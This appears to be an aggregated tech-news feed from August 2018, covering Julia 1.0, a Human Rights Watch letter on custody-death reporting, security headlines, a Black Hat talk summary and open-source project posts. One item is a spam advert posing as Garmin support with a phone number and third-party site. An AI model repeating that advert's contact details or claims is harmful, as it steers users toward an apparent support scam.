
          Network Break 135: HPE Vs. Nutanix; CCDE Exam Blues
Take a Network Break! This week we have stories on HPE and Nutanix, a mysterious CCDE exam cancellation, an open source telemetry project finding a home in the Linux Foundation & more.
          Julia 1.0 Released, 2018 State of Rust Survey, Samsung Galaxy Note 9 Launches Today, Margaret Dawson of Red Hat Named Business Role Model of the Year in Women in IT Awards and Creative Commons Awarded $800,000 from Arcadia

News briefs for August 9, 2018.

Julia 1.0 made its debut yesterday—the "culmination of nearly a decade of work to build a language for greedy programmers". The language's goal: "We want a language that's open source, with a liberal license. We want the speed of C with the dynamism of Ruby. We want a language that's homoiconic, with true macros like Lisp, but with obvious, familiar mathematical notation like Matlab. We want something as usable for general programming as Python, as easy for statistics as R, as natural for string processing as Perl, as powerful for linear algebra as Matlab, as good at gluing programs together as the shell. Something that is dirt simple to learn, yet keeps the most serious hackers happy. We want it interactive and we want it compiled." You can download it here.

The Rust Community announced the 2018 State of Rust Survey, and they want your opinions to help them establish future development priorities. The survey should take 10–15 minutes to complete, and is available here. And, you can see last year's results here.

Samsung Galaxy Note 9 launches today at 11am ET. You can watch the spectacle via Android Central, which will be streaming the live event.

Margaret Dawson, Vice President, Portfolio Product Marketing at Red Hat, was named Business Role Model of the Year at the inaugural Women in IT Awards USA. The awards were organized by Information Age to "redress the gender imbalance by showcasing the achievements of women in the sector and identifying new role models".

Creative Commons was awarded $800,000 from Arcadia (a charitable fund of Lisbet Rausing and Peter Baldwin) to support CC Search, which is "a Creative Commons technology project designed to maximize discovery and use of openly licensed content in the Commons". CC Search, along with Commons Metadata Library and the Commons API, plans to form the Commons Collaborative Archive and Library, a suite of tools that will "make the global commons of openly licensed content more searchable, usable, and resilient, and to provide essential infrastructure for collaborative online communities".


          PostgreSQL 10.5-1
A powerful, open source object-relational database system. 2018-08-09
          Comments on proposed DOJ Bureau of Justice Assistance (BJA) implementation of the Death in Custody Reporting Act (DCRA)

August 9, 2018

Mr. Chris Casto
Senior Advisor
Bureau of Justice Assistance
810 Seventh Street, NW
Washington, DC 20531
 
Re: Death in Custody Reporting Act Collection, 83 Fed. Reg. 27023 (June 11, 2018)
Comments submitted via DICRAComments@usdoj.gov  
 
Dear Mr. Casto:

On behalf of Human Rights Watch, I am writing in response to the Department of Justice’s (DOJ) request for comment on proposed DOJ Bureau of Justice Assistance (BJA) implementation of the Death in Custody Reporting Act (DCRA). Established in 1978, Human Rights Watch (HRW) is known for its accurate fact-finding, impartial reporting, effective use of media, and targeted advocacy, often in partnership with local human rights groups. Each year, we publish more than 100 reports and briefings on human rights conditions in some 90 countries, generating extensive coverage in local and international media. The United States Program of HRW protects and promotes the fundamental rights and dignity of every person subject to the authority of the US government.

DCRA was enacted as a result of bipartisan efforts on December 18, 2014, so that the government could account for the number of arrest-related deaths and other deaths in custody that are occurring in the United States. Nearly four years later, DCRA has not been implemented and the public continues to rely on media outlets for the number of people killed by police each year, which is estimated at 1,000.

DOJ must immediately adopt the near-final compliance guidelines for DCRA that were published in the Federal Register on December 19, 2016. These guidelines reflect extensive review and public engagement by DOJ around DCRA implementation through two comment periods, the first initiated on August 4, 2016, and a second initiated on December 19, 2016, during which HRW provided comments and joined the civil and human rights community in calling for implementation. Under the last set of guidelines published by DOJ in December 2016, states were to begin reporting arrest-related deaths in April of 2017, with reporting on all deaths in custody to begin in October 2017.

DOJ must proceed with implementing DCRA as set forth in the proposed December 2016 guidelines and as described below:

  1. States must proactively report all deaths in custody to DOJ and DOJ must verify the state data with open source research and data.

States should be required to initially report all deaths in custody to DOJ as required by DCRA. DOJ should then use media reports and other open source information to identify deaths in custody for purposes of comparison and supplementation.  This hybrid methodology recognizes state obligations to proactively report deaths in custody to the federal government, allowing states to develop dedicated programs and resources to ensure compliance with DCRA. A hybrid approach also helps ensure the most accurate, reliable, and complete method of securing national data.

  2. DOJ must further define what deaths are reportable under DCRA to ensure standardized and full compliance by states.

DCRA requires states and federal law enforcement agencies to report information about the death of anyone who is “detained, under arrest, or is in the process of being arrested, is en route to be incarcerated, or is incarcerated.” DOJ’s latest proposal for DCRA compliance defines “reportable death” to broadly include “deaths that occurred during interactions with law enforcement personnel or while the decedent was in their custody or in the custody, under the supervision, or under the jurisdiction of a state or local law enforcement or correctional agency, such as a jail or prison.” To ensure compliance and reduce variation among state reporting, DOJ should provide a list of broad, yet specific, circumstances that qualify as reportable deaths.  For example, DOJ should specify that a reportable death includes any death “due to any use of force by law enforcement personnel.” It is critical that any law enforcement action that results in a civilian death be reported.   

  3. DOJ must require reporting on any disability of those who die in custody.

DOJ must require states to report disability-related data for deaths in custody. It is estimated that a quarter to half of fatal police encounters involve a person with a disability. These disabilities include physical, intellectual, and psychiatric disabilities. To ensure comprehensive data on deaths in custody, a decedent’s disability should be reported just as race, gender, and other characteristics are to be reported. The Bureau of Justice Statistics (BJS) should consult with the nationwide network of disability protection and advocacy (P&A) agencies in each state, as well as seek information from community-based disability organizations, to ensure that disability is properly captured in deaths in custody reporting.

  4. States must adopt compliance plans.

Each state should be required to submit a detailed data collection plan to DOJ that summarizes how it will comply with DCRA. States should indicate how they will meet DCRA’s quarterly reporting requirements in a timely, accurate, and complete manner. These state compliance plans would facilitate data collection from local police departments to the states, which would then report to DOJ. Plans should also provide for audits of state reporting to ensure full compliance.

  5. Federal grants must be used to ensure state compliance.

States that do not comply with DCRA should have federal funding reduced until compliance is met as permitted by the statute. DCRA gives the Attorney General the power to subject noncompliant states to a 10 percent reduction of Edward Byrne Memorial Justice Assistance Grant Program (Byrne JAG) funds. After years of inadequate reporting, Congress included this provision in its reauthorization of DCRA to ensure compliance. DOJ must provide states with details on how and when Byrne JAG funds will be reduced for DCRA noncompliance.

In our May 2015 report, Callous and Cruel, HRW documented deaths behind bars of persons with mental health problems who were stunned with electric shock devices, restrained, subjected to massive amounts of pepper spray, and/or struck by correctional staff. Deaths of inmates (with or without mental health problems) at the hands of jail or prison staff continue to surface with unfortunate regularity in the news media. Yet our research, including conversations with correctional experts, suggests that there may be jail and prison inmates whose deaths following staff use of force are not reported publicly. Unknown deaths in custody that constitute homicides by correctional officers should not be permitted.

Information pertaining to those who died following staff use of force in jails and prisons, such as the role of involved staff, surrounding circumstances and related custodial settings, is as important as similar information for arrest-related deaths. We do not believe the burden of providing full information to the BJS on use of force deaths would outweigh the benefit to the public and to agencies themselves.

We appreciate your engagement on this matter and look forward to your response. If you have any questions, please contact me at 202-612-4343.

Sincerely,

Jasmine L. Tyler
US Program, Advocacy Director

          today's leftovers

          Amazon launches Auto SDK to bring Alexa to more cars

Amazon today announced an open source release of the Alexa Automotive Core (AAC) SDK, or Auto SDK, to help automakers integrate Alexa voice control into cars and their infotainment systems, screens often used for navigation, media, or climate control. The software development kit is free for download on GitHub and is optimized for bringing Alexa to in-car […]


          Security Leftovers
  • People Think Their Passwords Are Too Awesome For Two Factor Authentication. They’re Wrong.
  • Security updates for Thursday
  • Let's Encrypt Now Trusted by All Major Root Programs

    Now, the CA’s root is directly trusted by almost all newer versions of operating systems, browsers, and devices. Many older versions, however, still do not directly trust Let’s Encrypt.

    While some of these are expected to be updated to trust the CA, others won’t, and it might take at least five more years until most of them cycle out of the Web ecosystem. Until that happens, Let’s Encrypt will continue to use a cross signature.

  • WPA2 flaw lets attackers easily crack WiFi passwords

    The security flaw was found, accidentally, by security researcher Jens Steube while conducting tests on the forthcoming WPA3 security protocol; in particular, on differences between WPA2's Pre-Shared Key exchange process and WPA3's Simultaneous Authentication of Equals, which will replace it. WPA3 will be much harder to attack because of this innovation, he added.

  • Linux kernel network TCP bug fixed

    Another day, another bit of security hysteria. This time around the usually reliable Carnegie Mellon University's CERT/CC, claimed the Linux kernel's TCP network stack could be "forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet which can lead to a denial of service (DoS)."

  • State of Security for Open Source Web Applications 2018

    Each year, we publish a set of statistics summarizing the vulnerabilities we find in open source web applications. Our tests form part of Netsparker's quality assurance practices, during which we scan thousands of web applications and websites. This helps us to add to our security checks and continuously improve the scanner's accuracy.

    This blog post includes statistics based on security research conducted throughout 2017. But first, we take a look at why we care about open source applications, and the damage that can be caused for enterprises when they go wrong.

  • New Actor DarkHydrus Targets Middle East with Open-Source Phishing [Ed: Headline says "Open-Source Phishing," but this is actually about Microsoft Windows and Office (proprietary and full of serious bugs)]

    Government entities and educational institutions in the Middle East are under attack in an ongoing credential-harvesting campaign.

    Government entities and educational institutions in the Middle East are under attack in an ongoing credential-harvesting campaign, mounted by a newly-named threat group known as DarkHydrus. In a twist on the norm, the group is leveraging the open-source Phishery tool to carry out its dark work.

    The attacks follow a well-worn pattern, according to Palo Alto Networks’ Unit 42 group: Spear-phishing emails with attached malicious Microsoft Office documents are leveraging the “attachedTemplate” technique to load a template from a remote server.



          today's howtos



          Linux Foundation and Kernel News



          Security Leftovers
  • Voting By Cell Phone Is A Terrible Idea, And West Virginia Is Probably The Last State That Should Try It Anyway

    So we've kind of been over this. For more than two decades now we've pointed out that electronic voting is neither private nor secure. We've also noted that despite this several-decade-long conversation, many of the vendors pushing this solution are still astonishingly bad at not only securing their products, but acknowledging that nearly every reputable security analyst and expert has warned that it's impossible to build a secure fully electronic voting system, and that if you're going to do so anyway, at the very least you need to include a paper trail system that's not accessible via the internet.

  • Dell EMC Data Protection Advisor Versions 6.2 – 6.5 found Vulnerable to XML External Entity (XEE) Injection & DoS Crash

    An XML External Entity (XEE) injection vulnerability has been discovered in Dell's EMC Data Protection Advisor, versions 6.4 through 6.5. This vulnerability is found in the REST API, and it could allow an authenticated remote malicious attacker to compromise the affected systems by reading server files or causing a Denial of Service (DoS) crash through maliciously crafted Document Type Definitions (DTDs) in the XML request.

  • DeepLocker: Here’s How AI Could ‘Help’ Malware To Attack Stealthily

    By this time, we have realized how artificial intelligence is a boon and a bane at the same time. Computers have become capable of performing things that human beings cannot. It is not tough to imagine a world where AI could program human beings; thanks to the sci-fi television series available lately.

  • DeepLocker: How AI Can Power a Stealthy New Breed of Malware

    Cybersecurity is an arms race, where attackers and defenders play a constantly evolving cat-and-mouse game. Every new era of computing has served attackers with new capabilities and vulnerabilities to execute their nefarious actions.

  • DevSecOps: 3 ways to bring developers, security together

    Applications are the heart of digital business, with code central to the infrastructure that powers it. In order to stay ahead of the digital curve, organizations must move fast and deploy code quickly, which unfortunately is often at odds with stability and security.

    With this in mind, where and how can security fit into the DevOps toolchain? And, in doing so, how can we create a path for successfully deterring threats?

  • Top 5 New Open Source Security Vulnerabilities in July 2018 [Ed: Here is Microsoft's partner WhiteSource attacking FOSS today by promoting the perception that "Open Source" = bugs]
  • DarkHydrus Relies on Open-Source Tools for Phishing Attacks [Ed: I never saw a headline blaming "proprietary tools" or "proprietary back door" for security problems, so surely this author is just eager to smear FOSS]
  • If for some reason you're still using TKIP crypto on your Wi-Fi, ditch it – Linux, Android world bug collides with it [Ed: Secret 'standards' of WPA* -- managed by a corporate consortium -- not secure, still...]

    It’s been a mildly rough week for Wi-Fi security: hard on the heels of a WPA2 weakness comes a programming cockup in the wpa_supplicant configuration tool used on Linux, Android, and other operating systems.

    The flaw can potentially be exploited by nearby eavesdroppers to recover a crucial cryptographic key exchanged between a vulnerable device and its wireless access point – and decrypt and snoop on data sent over the air without having to know the Wi-Fi password. wpa_supplicant is used by Linux distributions and Android, and a few others, to configure the Wi-Fi for computers, gadgets, and handhelds.

  • Linux vulnerability could lead to DDoS attacks



          BlackHat USA 2018

Black Hat official website: https://www.blackhat.com/

About the conference

As the premier event of the global information security industry, Black Hat has a long history and is now in its 21st year. Talk selection for each conference is extremely strict, with fewer than 20% of submissions accepted, which is why Black Hat is also known as the most technical information security conference.

At this year's Black Hat, Anquanke has invited many of the attending security experts to share the highlights of the talks live from the venue.

Dates: August 8-9, 2018

Talk roundup: day two, first half

Stop that Release, There’s a Vulnerability!

Speaker: Christine Gadsby  |  Director, Product Security Operations, BlackBerry

Time: 9:00-9:25

Tags: Security Development Lifecycle, Enterprise

Software companies can have hundreds of software products in-market at any one time, all requiring support and security fixes with tight release timelines or no releases planned at all. At the same time, the velocity of open source vulnerabilities that rapidly become public or vulnerabilities found within internally written code can challenge the best intentions of any SDLC.
How do you prioritize publicly known vulnerabilities against internally found vulnerabilities? When do you hold a release to update that library for a critical vulnerability fix when it’s already slipped? How do you track unresolved vulnerabilities that are considered security debt? You ARE reviewing the security posture of your software releases, right?
As a software developer, product owner, or business leader being able to prioritize software security fixes against revenue-generating features and customer expectations is a critical function of any development team. Dealing with the reality of increased security fix pressure and expectations of immediate security fixes on tight timelines are becoming the norm.
This presentation looks at the real world process of the BlackBerry Product Security team. In partnership with product owners, developers, and senior leaders, they’ve spent many years developing and refining a software defect tracking system and a risk-based release evaluation process that provides an effective software ‘security gate.’ Working with readily available tools and longer-term solutions including automation, we will provide solutions attendees can take away and implement immediately.
• Tips on how to document, prioritize, tag, and track security vulnerabilities, their fixes, and how to prioritize them into release targets
• Features of common tools [JIRA, Bugzilla, and Excel] you may not know of, and examples of simple automation you can use to verify ticket resolution (a hedged sketch of one such check follows this list).
• A guide to building a release review process, when to escalate to gate a release, who to inform, and how to communicate.
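
As one concrete illustration of that kind of automation, here is a hedged Python sketch (an assumption-laden example, not BlackBerry's actual tooling) that queries JIRA's standard REST search endpoint for unresolved, security-labelled tickets targeting a release; the project key, label, fix version, and credentials are hypothetical placeholders.

# Hedged sketch: a release-gate check against JIRA's REST search API.
# The JQL values (project "PROD", label "security", fixVersion "1.2.0")
# and the credentials are hypothetical; /rest/api/2/search is JIRA's
# standard REST search endpoint.
import requests

JIRA_BASE = "https://jira.example.com"  # assumption: your JIRA instance
JQL = ('project = PROD AND labels = security '
       'AND fixVersion = "1.2.0" AND resolution = Unresolved')

def open_security_tickets(session):
    resp = session.get(
        f"{JIRA_BASE}/rest/api/2/search",
        params={"jql": JQL, "fields": "key,summary,priority"},
    )
    resp.raise_for_status()
    return [issue["key"] for issue in resp.json()["issues"]]

if __name__ == "__main__":
    s = requests.Session()
    s.auth = ("release-bot", "api-token")  # assumption: token-based auth
    blockers = open_security_tickets(s)
    if blockers:
        print("HOLD the release; open security tickets:", ", ".join(blockers))
    else:
        print("Security gate clear.")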


          E779: Brian Armstrong, Coinbase & Tim Draper, DFJ on the state of cryptocurrency’s maturing market: ICOs as new funding vehicle, disruption of VC, the end of fiat, rise of open source, & the continued dominance & resiliency of bitcoin
none
          E634: Hadley Wickham, RStudio Chief Scientist & open source pioneer, on breakthroughs in data science, visualization, statistics & the biggest philosophical questions facing humanity
none
          Offer - Dial +1877-370-8184 We help to troubleshoot Garmin Update Errors - USA
Different types of GPS devices are used by customers. Garmin has always been able to perfect top quality GPS devices for various sectors, for example aviation, marine and road transport, and offers open source solutions for updates. These solutions enable you to download, free of charge, the various updates needed to refresh your navigation system in several countries. GPS, the satellite-based navigation system intended to instantly provide position, speed and time data, has emerged in recent years as a revolutionary and advantageous technology. Garmin devices should be refreshed every day in order to provide the data accurately.

Some errors our Experts provide support for:
  • How to update GPS Map
  • How to update Garmin New version
  • Nuvi update storage
  • Free update error
  • Slow internet connection with GPS
  • VPN/Proxy is not disabled
  • How to use lifetime update Map

If you want to communicate with Garmin Experts, you can call our customer phone number. We are providing independent service without any time limit.
Visit: http://www.garmingpsupdate.com/
Thanks & Regards
Team Garmin
500 South Anaheim Hills, California 92807, USA
Phone: +1877-370-8184
Email: support@garmingpsupdate.com
          BasicMinimap (v8.0.7)
Change Log:
--------------------
BasicMinimap
v8.0.7 (2018-08-09)
Full Changelog Previous releases

Options: Don't restrict the size to multiples of 5. You can now type in a size between 140-145 for example.


Description:
--------------------
Please support my work on Patreon!

BasicMinimap is a basic solution to a clean, square minimap.

Features:
Moving & Scaling
Hiding blizz buttons
Zooming with mouse wheel & Auto zoom-out
Square or circular minimap
Auto showing the calendar button when invites arrive
Border and border color selection with class color support


Default buttons (configurable):
LeftClick: Ping Position
RightClick: Toggle Calendar
MiddleClick: Toggle Tracking


Options:

/bm
/basicminimap


BasicMinimap is open source and development is done on GitHub. You can contribute code, localization, and report issues there: https://github.com/funkydude/BasicMinimap
          Android 9 Pie source code reveals support for wallpapers in Always on Display mode
Google has just launched the latest version of its mobile operating system Android, the Android 9 Pie. Right after the announcement, the company started rolling out the Android 9 Pie OTA updates for its Pixel devices and shortly after the company started uploading the source code of Android Pie to the Android Open Source Project […]
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          What's your opinion of Slack as a business tool?

Messaging amongst co-workers is one of the most important forms of communication that your organization relies upon and Slack is an interesting tool for this constant need in all businesses.

I’ve been recommending businesses look at Slack (https://slack.com) as a means to thwart so many of today’s corporate-focused phishing scams, but it provides much more than just secure, private messaging.

A Little History

The initial creation of this cloud-based platform was as an internal communication tool developed by a group of developers working on an online gaming project.

When it became clear that the gaming project was not going to make it to market, the company refined their internal communication tool and started making it available to other companies.

What Does Slack Do?

In a nutshell, Slack is a combination of various familiar messaging platforms (chat, instant messaging, email) mixed with file sharing.

You start by creating a team or teams, depending upon your corporate structure and then create various channels that can either be public or private – think of channels as themes or topics.

All the information posted publicly is searchable by anyone in your organization from a single place, which is one of the biggest benefits to most companies.  Imagine a new employee being able to search every previous communication or uploaded file about virtually any subject from any device.

It essentially keeps important company communications and files from being trapped in individual email accounts and creates an archive for every current or future employee to use as well.

How Can It Help?

If you think about how much of today’s inter-office communication is conducted via email, it’s not hard to see how lots of important information never gets to everyone that should be in the loop.


Unless an employee remembers to CC or BCC someone that should be part of a conversation (which, done incorrectly, is a constant irritation in and of itself), that person will be left out of the loop.

Another huge challenge that most companies face is a single employee being tricked by a clever scammer’s email message that is posing as a fellow employee or important person in management.

By moving all your inter-office communications to a platform like Slack, you can instantly train every employee to be suspicious or ignore any email message that claims to be from another employee or company management.

Slack offers a free version of its tool that may be all a small group may need: https://goo.gl/mqvpQC


Potential Issues

As popular as this platform has become with so many businesses, there are things you’ll need to consider before attempting to convert your company to this new tool.

Using Slack can easily be perceived as ‘yet another thing I have to check’ by your already busy employees, so make sure you understand what it will take for Slack to become valuable to everyone, not just management.

Slack stores all of your communications on its own servers; if that’s a non-starter for you, check out open source, self-hosted alternatives from Mattermost (https://mattermost.com) or Rocket.Chat (https://rocket.chat).


          Why Red Hat Invested $250M in CoreOS to Advance Kubernetes

For the last three years or so, Red Hat has been on a collision course with CoreOS, with both firms aiming to grow their respective Kubernetes platform. On Jan. 30, the competition between the two firms ended, with CoreOS agreeing to be acquired by Red Hat in a $250 million deal.

CoreOS didn't start out as a Kubernetes platform vendor, but then again neither did Red Hat. CoreOS' original innovations were the etcd distributed key value store, a purpose-built container Linux operating system (originally known as CoreOS Linux) and the company's Fleet platform that enabled Docker containers to easily be run as a cluster. In a 2017 video interview with ServerWatch, CoreOS co-founder and CTO Brandon Philips explained why his company moved on from Fleet and embraced Kubernetes with its Tectonic platform.

Red Hat's OpenShift platform was originally built on technology acquired from Platform-as-a-Service vendor Makara in 2010. Red Hat entirely re-worked the platform for its 3.0 release in 2015, re-basing it on Docker and Kubernetes.

While Red Hat OpenShift and CoreOS Tectonic are both based on Kubernetes, they were highly competitive with each other. Though that's not how Red Hat sees it.

"CoreOS' existing commercial products are complementary to existing Red Hat solutions," Matt Hicks, senior vice president, engineering, Red Hat, told ServerWatch . "Our specific plans and timeline around integrating products and migrating customers to any combined offerings will be determined over the coming months."

Hicks said that it is Red Hat's belief that CoreOS customers will benefit from industry-leading container and Kubernetes solutions, a broad portfolio of enterprise open source software, world-class support and an extended partner network.

CoreOS had been leading the development of the rkt container runtime, which is a rival to the Docker-backed containerd runtime. Red Hat has its own effort known as CRI-O, which is based on containerd. CRI-O 1.0 was released in October 2017.

"rkt has a sustaining community within the Cloud Native Computing Foundation (CNCF) and that won't change," Hicks said. " Red Hat and CoreOS are both committed to furthering the standardization of key container standards to further enterprise adoption, as evidenced by our leadership positions within OCI. Specific product-level decisions will come in the following weeks around future investments."

Why Now?

Red Hat and CoreOS were actively competing against each other in the market. Red Hat CEO Jim Whitehurst has made multiple comments in recent months about the financial success OpenShift has had.

"If you believe containerized applications will be kind of how applications are developed in the future, it will be a substantial opportunity," Whitehurstsaidin September 2017. "There is a lot of value in it [OpenShift], because it includes RHEL, it includes a fully supported life cycle Kubernetes and a whole set of management tools, and then, obviously, above that a whole developer tool chain."

Now with CoreOS as part of Red Hat, the value in OpenShift can potentially be expanded even further. Hicks said that CoreOS can expand Red Hat’s technology leadership in containers and Kubernetes and enhance core platform capabilities in OpenShift, Red Hat Enterprise Linux and Red Hat’s integrated container portfolio.

"Bringing CoreOS’s technologies to the Red Hat portfolio can help us further automate and extend operational management capabilities for OpenShift administrators and drive greater ease of use for end users building and managing applications on our platform," Hicks said.

Hicks added that CoreOS’s offerings complement Red Hat’s container solutions in a number of ways:

Tectonic and its investment in the Kubernetes project that it is based on are complementary to Red Hat OpenShift and Red Hat’s own investments in Kubernetes. CoreOS can further extend Red Hat’s leadership and influence in the Kubernetes upstream community and also bring new enhancements to Red Hat OpenShift around automated operations and management.

Container Linux and its investment in container-optimized Linux and automated “over the air” software updates are complementary to Red Hat Enterprise Linux, Red Hat Enterprise Linux Atomic Host and Red Hat’s integrated container runtime and platform management capabilities. Red Hat Enterprise Linux’s content, the foundation of our application ecosystem, will remain our only Linux offering. Meanwhile, some of the delivery mechanisms pioneered by Container Linux will be reviewed by a joint integration team and reconciled with Atomic.

Quay brings expanded registry capabilities that can both enhance OpenShift’s integrated registry component and the Red Hat Container Catalog and be used as a standalone component.

In the final analysis, with Red Hat's acquisition of CoreOS, the big shift is that there is one less competitor in the Kubernetes landscape and the biggest player, just got bigger.

Sean Michael Kerner is a senior editor at ServerWatch and InternetNews.com. Follow him on Twitter @TechJournalist.


          My Own Car System, Rear Camera, Offline Maps & Routing, Map Matching with ...

This is my journey building an open source car system with Go & Qt, rear camera, live OpenGL map …

Cross compilation

In Part I, I had to patch qtmultimedia for the camera to work, but Qt compilation is resource hungry, and the same goes for the OSRM compilation; the memory of the Raspberry Pi is too small.

I had to set up a cross compilation system, in my case for armv7h.

QML Development

Since most of the application is in QML, I’ve used the C++ main.cpp launcher as long as possible for the development.

The moment I needed to inject data from the outside world (like the GPS location) into QML via Qt, I switched to Go using the therecipe Qt Go bindings.

The Go bindings project is young but the main author is really active fixing issues.

It makes desktop applications easy to code without the hassle of C++ (at least for me).

About QML: by separating the logic and forms using .ui.qml files, you can still edit your views with Qt Creator:

That’s just the theory; the truth is Creator is really buggy, and I edited the .ui files by hand most of the time.

I worked with Interface Builder on iOS for years; Qt is painful, and the lack of a decent visual editor for QML really hurts.

Serving the map without internet access

In Part I, we talked about OpenMapTiles and OpenGL rendering, but I needed a web server capable of reading MBTiles format and serving the necessary assets for the map to be rendered.

I’ve created mbmatch in Go for that purpose, so Mocs can render the map without Internet access; it will also map match the positions in the future.
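
For illustration only (mbmatch itself is written in Go, and this is not its code), here is a minimal Python sketch of what serving tiles from an MBTiles file involves. It assumes the standard MBTiles layout: an SQLite database with a tiles(zoom_level, tile_column, tile_row, tile_data) table using TMS row numbering, so the y coordinate of XYZ-style requests has to be flipped.

# Minimal MBTiles tile server sketch (illustrative; the real project,
# mbmatch, is written in Go). Assumes the standard MBTiles schema and
# TMS row numbering; "map.mbtiles" is a placeholder file name.
import sqlite3
from http.server import BaseHTTPRequestHandler, HTTPServer

DB = sqlite3.connect("map.mbtiles", check_same_thread=False)

class TileHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        try:
            z, x, y = (int(p) for p in self.path.strip("/").split("/"))
        except ValueError:
            self.send_error(400, "expected /z/x/y")
            return
        tms_y = (2 ** z - 1) - y  # XYZ -> TMS row flip
        row = DB.execute(
            "SELECT tile_data FROM tiles "
            "WHERE zoom_level=? AND tile_column=? AND tile_row=?",
            (z, x, tms_y),
        ).fetchone()
        if row is None:
            self.send_error(404)
            return
        self.send_response(200)
        # OpenMapTiles vector tiles are gzipped protobufs; a real server
        # would also set Content-Encoding and serve the style assets.
        self.send_header("Content-Type", "application/x-protobuf")
        self.end_headers()
        self.wfile.write(row[0])

HTTPServer(("127.0.0.1", 8000), TileHandler).serve_forever()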

Experimenting with another touch screen

I’m using a less performant but smaller LANDZO 5-inch 800x480 touch display.

This touchscreen is handled as a one-button mouse.

It can be calibrated using tslib's ts_calibrate command.

Then, in your startup environment, tell Qt to use tslib:

TSLIB_TSDEVICE=/dev/input/event0 QT_QPA_GENERIC_PLUGINS=tslib:/dev/input/event0 QT_QPA_FB_TSLIB=1

GPS

Like I said in Part I, the Linux GPS daemons use obscure and overcomplicated protocols, so I’ve decided to write my own GPS daemon in Go using a gRPC stream interface. You can find it here.

I’m also not satisfied with the map matching of OSRM for real time display; I may rewrite one using mbmatch.

POIs

I’ve started POI lookups with full text search and geo proximity using bleve, by exposing an API compatible with the OSM API so it can be used directly by QML Locations.

Night Map

I’m a huge fan of the Solarized colors, so I’ve made a style for the map; you can find it here.


Speeding up boot

systemctl mask systemd-udev-settle.service
systemctl mask lvm2-activation-net.service
systemctl mask lvm2-monitor.service

Status

The project is far from finished and not ready for everybody but it’s fun to play with.

I’ve open sourced most of the code for Mocs on GitHub; feel free to contribute.


          Trustwave releases Social Mapper, an open source tool using facial recognition to find people's social profiles at scale, says it will help ethical hackers (Melanie Ehrenkranz/Gizmodo)

Melanie Ehrenkranz / Gizmodo:
Trustwave releases Social Mapper, an open source tool using facial recognition to find people's social profiles at scale, says it will help ethical hackers  —  Security researchers released a tool this week that lets you collect social media profiles of a massive amount of people using face recognition.


          Re: Suitability for Class Administration Only
by Colin Fraser.  

IMNSHO, it is tempting to try to adapt a favoured tool to another purpose, but in this case, what you're asking for is, I suggest, well outside Moodle's remit. What you're looking for is a Content Management System (CMS) or a Student Management System (SMS), not a Learning Management System. Moodle can be linked to PayPal, for one, for payment of courses, and synced with Google Calendar (I think), but for things like teacher scheduling/tracking (essentially personnel/project management), asset management and advertising, no. I think you're setting yourself up for a lot of unhappy outcomes after an enormous amount of work.

An online CMS would be something like Drupal or Joomla. I understand you can build such administrative capabilities into your system with these tools. There are a number of more specific Open Source products, I suspect, something like OpenBravo to take care of the financials and asset tracking, OpenOffice or LibreOffice for business functions, with OpenProject for project management. Some of these should fit into Drupal or Joomla, so it may be you can build a small system to suit your own needs fairly quickly. Drupal has a steep learning curve; Joomla is a bit more friendly apparently.

I doubt there is a small, inexpensive tool that will do everything you need, but I would think there are a number of really expensive tools that could do what you want, right out of the box. So basically, what do you want to pay for? How much do you want to pay? Good luck.


          One Billion Apples' Secret Sauce: Recipe for the Apple Wireless Direct Link Ad hoc Protocol. (arXiv:1808.03156v1 [cs.NI])

Authors: Milan Stute, David Kreitschmann, Matthias Hollick

Apple Wireless Direct Link (AWDL) is a proprietary and undocumented IEEE 802.11-based ad hoc protocol. Apple first introduced AWDL around 2014 and has since integrated it into its entire product line, including iPhone and Mac. While we have found that AWDL drives popular applications such as AirPlay and AirDrop on more than one billion end-user devices, neither the protocol itself nor potential security and Wi-Fi coexistence issues have been studied. In this paper, we present the operation of the protocol as the result of binary and runtime analysis. In short, each AWDL node announces a sequence of Availability Windows (AWs) indicating its readiness to communicate with other AWDL nodes. An elected master node synchronizes these sequences. Outside the AWs, nodes can tune their Wi-Fi radio to a different channel to communicate with an access point, or could turn it off to save energy. Based on our analysis, we conduct experiments to study the master election process, synchronization accuracy, channel hopping dynamics, and achievable throughput. We conduct a preliminary security assessment and publish an open source Wireshark dissector for AWDL to nourish future work.


          HUMAN RESOURCES ASSISTANT (IMPIEGATA/O RISORSE UMANE) in Bibione (VE) - OSM open source management - Bibione, Veneto
For the office in Bibione (VE). Would you like to be the person in charge of growing a successful company, starting from its internal staff and... €1,400 - €2,000 per month
From Indeed - Fri, 27 Jul 2018 08:32:01 GMT - View all jobs in Bibione, Veneto
          Updated ILIAS to 5.2.18
ILIAS (ID : 619) package has been updated to version 5.2.18. ILIAS is a powerful Open Source Learning Management System for developing and realising web-based e-learning. The software was developed to reduce the costs of using new media in education and further training and to ensure the maximum level of customer influence in the implementation … Continue reading "Updated ILIAS to 5.2.18"
          Leaky Amazon S3 Buckets: Challenges, Solutions and Best Practices

Amazon Web Service (AWS) S3 buckets have become a common source of data loss for public and private organizations alike. Here are five solutions you can use to evaluate the security of data stored in your S3 buckets.

For business professionals, the public cloud is a smorgasbord of micro-service offerings which provide rapid delivery of hardware and software solutions. For security and IT professionals, though, public cloud adoption represents a constant struggle to secure data and prevent unexpected exposure of private and confidential information. Balancing these requirements can be tricky, especially when trying to adhere to your organization’s unique Corporate Information Security Policies and Standards.

Amazon Web Service (AWS) S3 buckets have become a common source of data loss for public and private organizations alike. Industry researchers and analysts most often attribute the root cause of the data loss to misconfigured services, vulnerable applications/tools, wide-open permissions, and / or usage of default credentials.

Recent examples of data leaks from AWS storage buckets include:

Data leakage is only one of the many risks presented by misuse of AWS S3 buckets. For example, attackers could potentially replace legitimate files with malicious ones for purposes of cryptocurrency mining or drive-by attacks.

To make matters worse for organizations (and simpler for hackers), automated tools are available to help find insecure S3 buckets.

How to protect data stored in AWS S3 buckets

Going back to the basics provides the most direct path to protecting your data. Recommended best practices for S3 buckets include always applying the principle of least privilege by using IAM policies and resource-based controls via Bucket Policies and Bucket ACLs.

Another best practice is to define a clear strategy for bucket content by taking the following steps:

  • Creating automated monitoring / audits / fixes of S3 bucket security changes via Cloud Trail, Cloud Watch and Lambda.
  • Creating a bucket lifecycle policy to transfer old data to an archive automatically based on usage patterns and age.
